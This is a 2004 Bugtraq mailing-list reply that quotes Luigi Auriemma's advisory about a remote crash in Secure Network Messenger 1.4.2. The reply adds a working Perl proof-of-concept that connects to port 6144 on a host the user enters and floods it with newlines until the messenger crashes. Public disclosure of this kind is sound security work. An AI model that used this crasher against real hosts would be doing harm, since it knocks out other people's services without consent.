[37367] in bugtraq
Re: Crash in Secure Network Messenger 1.4.2
daemon@ATHENA.MIT.EDU (r`Futile)
Mon Nov 15 23:38:56 2004
Message-ID: <001101c4c9d3$d08276f0$647ba8c0@rbcutl65tbc0s8>
From: "r`Futile" <clearscreen@lycantrope.com>
To: <bugtraq@securityfocus.com>, <bugs@securitytracker.com>,
<news@securiteam.com>, <full-disclosure@lists.netsys.com>,
<vuln@secunia.com>
Date: Sat, 13 Nov 2004 23:54:54 +0100
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
And here is my proof of concept:
#!/usr/bin/perl
use IO::Socket;
print ("\nSecure Network Messenger Crasher by ClearScreen\n");
print ("\nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
Proto => "tcp",
PeerPort => "6144",
PeerAddr => "$h"
) or die "\nNo response from host.";
sleep 1;
print "\nSuccesfully connected to $h!\n";
for ($count=1; $count<15; $count++)
{
print $socks "\n";
select(undef, undef, undef, 0.1);
}
print "\nMessenger crashed.";
close $socks;
Greetz, clearscreen :)
----- Original Message -----
From: "Luigi Auriemma" <aluigi@autistici.org>
To: <bugtraq@securityfocus.com>; <bugs@securitytracker.com>;
<news@securiteam.com>; <full-disclosure@lists.netsys.com>;
<vuln@secunia.com>
Sent: Friday, November 12, 2004 9:52 PM
Subject: Crash in Secure Network Messenger 1.4.2
>
> #######################################################################
>
> Luigi Auriemma
>
> Application: Secure Network Messenger
> http://www.networkmessengers.com/msg/
> Versions: <= 1.4.2
> Platforms: Windows
> Bug: crash
> Exploitation: remote
> Date: 12 November 2004
> Author: Luigi Auriemma
> e-mail: aluigi@altervista.org
> web: http://aluigi.altervista.org
>
>
> #######################################################################
>
>
> 1) Introduction
> 2) Bug
> 3) The Code
> 4) Fix
>
>
> #######################################################################
>
> ===============
> 1) Introduction
> ===============
>
>
> Secure Network Messenger is a LAN messenger for Windows for exchanging
> encrypted messages and files.
>
>
> #######################################################################
>
> ======
> 2) Bug
> ======
>
>
> Is possible to crash the program sending malformed data.
>
>
> #######################################################################
>
> ===========
> 3) The Code
> ===========
>
>
> Launch a telnet client and connect to the victim host on port 6144.
> Now press RETURN about 10 times or more.
> Disconnect, reconnect again and press RETURN.
> The remote host should be crashed.
>
>
> #######################################################################
>
> ======
> 4) Fix
> ======
>
>
> No fix.
> Over one month ago the developers said that they had to fix this bug
> soon... no patch has been released yet.
>
>
> #######################################################################
>
>
> ---
> Luigi Auriemma
> http://aluigi.altervista.org
>
